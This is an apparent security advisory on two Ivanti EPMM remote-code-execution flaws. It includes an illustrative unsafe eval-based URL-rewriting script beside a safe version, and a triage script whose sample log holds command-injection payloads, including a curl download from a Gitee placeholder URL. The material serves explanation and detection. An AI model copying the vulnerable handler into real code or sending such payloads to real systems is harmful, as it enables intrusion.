Critical Ivanti EPMM Zero-Day Vulnerabilities Exploited in Corporate Networks
In early 2026, two critical zero-day vulnerabilities were disclosed in Ivanti Endpoint Manager Mobile (EPMM), posing a significant threat to enterprise networks worldwide. Tracked as CVE-2026-1281 and CVE-2026-1340, the flaws let an unauthenticated remote attacker execute arbitrary code on the EPMM server, with no credentials and no user interaction required.
Global Impact and Affected Sectors
The exploitation of these vulnerabilities has been widespread, affecting organizations across the United States, Germany, Australia, and Canada. Sectors particularly impacted include state and local governments, healthcare, manufacturing, professional services, and high technology. Attackers have leveraged these flaws to gain complete control over mobile device management infrastructures, allowing them to establish reverse shells, install web shells, conduct reconnaissance, and deploy malicious software.
Technical Details of the Vulnerabilities
Both vulnerabilities stem from unsafe bash script usage in legacy components responsible for URL rewriting within the Apache web server configuration. Those scripts are driven by request-derived input, and the unsafe handling means attacker-supplied URL content is interpreted by the shell as commands rather than treated as data.
– CVE-2026-1281: This vulnerability affects scripts used for the In-House Application Distribution feature.
– CVE-2026-1340: This flaw impacts the Android File Transfer mechanism.
Exploitation of these vulnerabilities allows attackers to execute arbitrary commands on the appliance, access sensitive information stored in EPMM, and potentially move laterally to connected systems and services.
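The failure mode described above, as an added illustration that is not Ivanti's code and does not reproduce the actual EPMM scripts: Apache's RewriteMap prg: type starts an external program at server startup, feeds it one lookup key per line on stdin and reads one answer line back (the literal NULL meaning "no mapping"), which is how a shell script ends up in the URL rewriting path. The script below, with a hypothetical config wiring and an assumed /var/www/apps root, places an unsafe handler that re-parses the key with eval next to a hardened one that validates the key and only ever uses quoted parameter expansion.

```shell
#!/bin/sh
# Added example, not Ivanti's code: a RewriteMap "prg:" helper in shell.
# Apache writes one lookup key per line to this program's stdin and expects
# exactly one line back; "NULL" means "key not found". The key is taken
# straight from the request URL, so everything in it is attacker-controlled.
#
# Assumed httpd.conf wiring (hypothetical paths, not EPMM's):
#   RewriteMap appdist prg:/opt/example/appdist-map.sh
#   RewriteRule ^/dist/(.*)$ ${appdist:$1} [L]
# A prg: map runs under the user that launched httpd unless the optional
# user:group argument is given, so injected commands may run with more
# privilege than ordinary request handling.

APP_ROOT=/var/www/apps   # assumed location of distributable app files

# UNSAFE: eval hands the key back to the shell parser, so $(...), backticks
# and ; inside the URL become commands executed by the map process.
unsafe_map() {
  eval "printf '%s/%s\n' \"$APP_ROOT\" $1"
}

# SAFE: never let the key reach the parser. Accept only a conservative
# character set, refuse any ".." segment, and build the answer with quoted
# expansion so the key is data no matter what it contains.
safe_map() {
  key=$1
  case $key in
    ''|*..*|*[!A-Za-z0-9._/-]*) printf 'NULL\n' ;;
    *) printf '%s/%s\n' "$APP_ROOT" "$key" ;;
  esac
}

# Serve lookups for httpd when invoked with REWRITEMAP_SERVE=1; the loop is
# guarded so the functions above can also be sourced and exercised directly.
if [ "${REWRITEMAP_SERVE:-0}" = 1 ]; then
  while IFS= read -r key; do
    safe_map "$key"
  done
fi
```

The allowlist in safe_map is deliberately narrow: it is easier to widen a character set when a legitimate key is rejected than to enumerate every shell metacharacter an attacker might find useful.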
Attack Methods and Malicious Activity
Security researchers have observed various malicious activities associated with these vulnerabilities:
– Deployment of Web Shells: Attackers have installed lightweight JSP web shells, with names such as 401.jsp, 403.jsp, and 1.jsp, in the server’s web application directory. A web shell runs with whatever privileges the web server process holds, so where that process runs with elevated rights the shell gives the attacker equivalent control of the appliance.
– Malware Installation: Threat actors have attempted to download the Nezha agent, an open-source server monitoring and remote management tool, from repositories hosted on Gitee, with parameters suggesting the campaign was aimed at victims in China. Some campaigns went on to fetch second-stage payloads that installed cryptominers or persistent backdoors on compromised appliances.
– Reconnaissance Techniques: Attackers have injected sleep commands to confirm that a server is exploitable before doing anything noisier: if a request carrying sleep N returns roughly N seconds late, commands are executing even though nothing is echoed back. This blind, time-based check leaves little trace beyond a slow request, so hunting for it means looking for sleep in request paths or parameters together with unusually long response times.
Mitigation and Recommendations
Ivanti has released version-specific patches (RPM 12.x.0.x or RPM 12.x.1.x) that require no downtime and take only seconds to apply. Organizations are strongly advised to:
1. Apply Patches Immediately: Ensure that all vulnerable systems are updated with the latest patches to mitigate the risk of exploitation.
2. Review Systems for Signs of Exploitation: Audit appliances for the indicators described above, in particular JSP files in the web application directory that the product did not ship, sleep-based probes and outbound downloads from unexpected hosts in the logs, since exploitation may have preceded patching.
3. Implement Additional Security Measures: Restrict exposure of the EPMM web interface to the networks that need it, deploy intrusion prevention and network monitoring capable of flagging the patterns described above, and treat a patched appliance that shows any of those indicators as compromised rather than remediated, because the patch closes the vulnerability but does not remove a web shell that was already installed.
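The indicators listed under Attack Methods and the review called for in step 2, as an added triage script that is not from Ivanti or the researchers who reported the activity: it lists the published web-shell file names, reports any JSP file missing from a known-good baseline, and counts sleep-based probes, requests referencing gitee.com and hits on the shell files in an Apache access log. The web root, the log format and the request paths in the constructed sample are assumptions, not EPMM's real endpoints.

```shell
#!/bin/sh
# Added triage helpers (not Ivanti's or the researchers' code). Only the
# indicators from the article are used: web shells named 401.jsp, 403.jsp
# and 1.jsp; sleep-based probing; downloads from Gitee. The web root, log
# format and request paths below are assumptions.

SHELL_NAMES='401.jsp 403.jsp 1.jsp'

# find_named_shells WEBROOT: print every file under WEBROOT whose name is
# one of the published web-shell names.
find_named_shells() {
  webroot=$1
  for n in $SHELL_NAMES; do
    find "$webroot" -type f -name "$n"
  done | sort
}

# find_unexpected_jsp WEBROOT BASELINE: print .jsp files under WEBROOT that
# are absent from BASELINE (one relative path per line). A renamed shell
# will not match the published names, so compare against what the
# appliance is supposed to contain rather than against a blocklist.
find_unexpected_jsp() {
  webroot=$1; baseline=$2
  ( cd "$webroot" && find . -type f -name '*.jsp' | sed 's|^\./||' | sort ) \
    | grep -v -x -F -f "$baseline" || true
}

# scan_access_log LOGFILE: count time-based probes (a sleep command with a
# delay in the request line, raw or URL-encoded), requests referencing
# gitee.com, and hits on the named shell files.
# Prints "probes=N gitee=N shells=N".
scan_access_log() {
  log=$1
  probes=$(grep -E -i -c 'sleep(%20|\+| )[0-9]+' "$log" || true)
  gitee=$(grep -E -i -c 'gitee\.com' "$log" || true)
  shells=$(grep -E -c '/(401|403|1)\.jsp' "$log" || true)
  printf 'probes=%s gitee=%s shells=%s\n' "$probes" "$gitee" "$shells"
}

# make_sample_data: build a constructed web root, baseline and access log in
# a temp directory and print its path. Every endpoint here is made up.
make_sample_data() {
  d=$(mktemp -d)
  mkdir -p "$d/webroot/sub"
  : > "$d/webroot/index.jsp"
  : > "$d/webroot/login.jsp"
  : > "$d/webroot/401.jsp"        # planted, matches a published name
  : > "$d/webroot/sub/1.jsp"      # planted, matches a published name
  printf 'index.jsp\nlogin.jsp\n' > "$d/baseline.txt"
  cat > "$d/access.log" <<'EOF'
203.0.113.10 - - [12/Jan/2026:10:01:02 +0000] "GET /example/login.jsp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [12/Jan/2026:10:01:05 +0000] "GET /example/dist?app=%24%28sleep%2010%29 HTTP/1.1" 200 12 "-" "curl/8.4.0"
203.0.113.10 - - [12/Jan/2026:10:01:21 +0000] "GET /example/transfer?f=x;sleep+5 HTTP/1.1" 200 12 "-" "curl/8.4.0"
203.0.113.10 - - [12/Jan/2026:10:02:40 +0000] "GET /example/dist?app=%24%28curl%20-o%20/tmp/a%20https://gitee.com/example/repo/raw/a%29 HTTP/1.1" 200 12 "-" "curl/8.4.0"
203.0.113.10 - - [12/Jan/2026:10:03:01 +0000] "GET /example/401.jsp?c=id HTTP/1.1" 200 40 "-" "curl/8.4.0"
203.0.113.10 - - [12/Jan/2026:10:03:02 +0000] "POST /example/1.jsp HTTP/1.1" 200 40 "-" "curl/8.4.0"
EOF
  printf '%s\n' "$d"
}

# Run against the constructed sample when EPMM_TRIAGE_DEMO=1; on a real
# appliance call the functions with the actual web root, baseline and log.
if [ "${EPMM_TRIAGE_DEMO:-0}" = 1 ]; then
  d=$(make_sample_data)
  scan_access_log "$d/access.log"
  find_named_shells "$d/webroot"
  find_unexpected_jsp "$d/webroot" "$d/baseline.txt"
  rm -rf "$d"
fi
```

A non-zero probe or Gitee count is a lead, not a verdict, so pair the log hits with the response-time column of the real log and with file timestamps in the web root; a baseline for find_unexpected_jsp should come from a clean installation of the same EPMM version, not from the suspect appliance.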
Conclusion
The discovery and active exploitation of CVE-2026-1281 and CVE-2026-1340 underscore the critical importance of timely vulnerability management and proactive security measures. Organizations must remain vigilant, apply necessary patches promptly, and continuously monitor their systems to defend against evolving cyber threats.